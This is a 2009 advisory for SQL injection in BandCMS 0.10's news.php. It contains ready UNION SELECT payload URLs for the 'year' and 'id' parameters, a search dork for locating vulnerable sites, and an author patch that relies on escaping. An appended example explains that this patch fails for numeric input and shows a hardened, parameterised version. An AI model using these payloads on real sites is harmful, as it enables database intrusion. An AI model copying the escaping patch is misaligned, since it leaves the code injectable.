BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities

2009.09.22
Credit: Affix
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#################################################################
#                     http://root-the.net                       #
#################################################################
#[+] BandCMS v0.10 news.php Multi SQL Injection Vulnerabilities #
#[+] Vendor  : http://rockband.sourceforge.net/                 #
#[+] Exploit : Affix <root@root-the.net>                        #
#[+] Dork    : "Powered by Rock Band CMS 0.10"                   #
#[+] Greetz  : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead, #
#              str0ke, tekto, raT, uNkn0wn.ws, ryan1918.com     #
#################################################################

BandCMS v0.10 has an SQL injection in news.php.

Code (news.php, year parameter):

if(isset($_GET['year'])){
    $year = $_GET['year'];
    $smarty->assign('news', $db->getNewsYear($year));
}

Exploit:

http://site.com/news.php?year=-2004+UNION+SELECT+1,2,3,4--

Code (news.php, id parameter):

$id = $_GET['id'];
$newsItem = $db->getNewsItem($id);
$smarty->assign('news', $newsItem);

Exploit:

http://site.com/news.php?id=-1+UNION+SELECT+1,2,3,4--

Patch:

Since I'm a nice guy, here is a fix: change both variables as follows.

$year = addslashes(mysql_real_escape_string($_GET['year']));

$id = addslashes(mysql_real_escape_string($_GET['id']));

#################################################################
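A point worth checking before applying the patch above: both payloads are integers followed by UNION SELECT and contain no quote or backslash characters, so addslashes() and mysql_real_escape_string() leave them untouched, and an unquoted numeric interpolation is still injectable. The following added example (not BandCMS code, and not from the advisory) reproduces that query pattern in Python against an in-memory SQLite table whose columns are assumed, and contrasts it with integer validation plus a bound parameter.

```python
import re
import sqlite3

# Constructed sample rows standing in for the CMS news table (column names are assumptions).
ROWS = [(1, "Tour dates", 2004, "public"), (2, "New album", 2005, "public")]

# The year payload from the advisory, URL-decoded.
PAYLOAD = "-2004 UNION SELECT 1,2,3,4--"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, year INTEGER, body TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?, ?)", ROWS)
    return db


def mysql_real_escape_string(s: str) -> str:
    """Python model of PHP's mysql_real_escape_string(): escapes only these characters."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def addslashes(s: str) -> str:
    """Python model of PHP's addslashes(): backslash before ' " \\ and NUL."""
    return "".join({"'": "\\'", '"': '\\"', "\\": "\\\\", "\0": "\\0"}.get(c, c) for c in s)


def get_news_year_escaped(db: sqlite3.Connection, year: str) -> list:
    """The advisory's patch: escape, then interpolate the value unquoted (assumed query shape).
    A purely numeric payload passes through unchanged, so the UNION still executes."""
    safe = addslashes(mysql_real_escape_string(year))
    return db.execute(f"SELECT id, title, year, body FROM news WHERE year = {safe}").fetchall()


def get_news_year_bound(db: sqlite3.Connection, year: str) -> list:
    """Hardened variant: the parameter is an integer, so validate it as one and bind it.
    Anything that is not a plain integer is rejected before any SQL is built."""
    if not re.fullmatch(r"-?\d+", year):
        raise ValueError("year must be an integer")
    return db.execute("SELECT id, title, year, body FROM news WHERE year = ?", (int(year),)).fetchall()
```

With the escaped version the payload returns the attacker-chosen row (1, 2, 3, 4); the bound version raises ValueError for it and answers normally for a real year.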

References:

http://xforce.iss.net/xforce/xfdb/52940
http://www.vupen.com/english/advisories/2009/2494
http://www.milw0rm.com/exploits/9553
http://secunia.com/advisories/36517

